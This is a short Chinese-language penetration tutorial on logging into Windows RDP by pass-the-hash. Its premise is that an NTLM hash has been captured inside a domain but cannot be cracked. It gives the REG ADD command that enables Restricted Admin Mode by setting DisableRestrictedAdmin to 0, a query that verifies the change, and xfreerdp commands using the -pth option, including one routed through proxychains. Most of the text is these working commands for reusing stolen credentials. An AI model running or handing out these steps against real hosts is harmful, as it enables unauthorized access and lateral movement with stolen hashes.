Hash传递登录RDP-By Xfreerdp

在域内抓到NTLMhash后,由于无法解出明文密码导致无法登录目标RDP,那么可以使用hash传递进行登录。

开启 Restricted Admin Mode

开启"Restricted Admin Mode", 在Windows8.1和Windows Server 2012R2上默认开启。

注册表键值位置:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa 新建DWORD键值DisableRestrictedAdmin,值为0,代表开启;值为1,代表关闭

开启命令:

REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

查看是否开启成功:

REG query "HKLM\System\CurrentControlSet\Control\Lsa" | findstr "DisableRestrictedAdmin"

REG_DWORD 0x0 存在就是开启

示例:

使用xfreerdp

Kali自带xfreerdp工具,该工具可用于PTH方法登录RDP

具体命令:

xfreerdp -u 用户名 -pth NTMLhash -v IP

示例:

proxychains xfreerdp -u Administrator -pth NTMLhash -v IP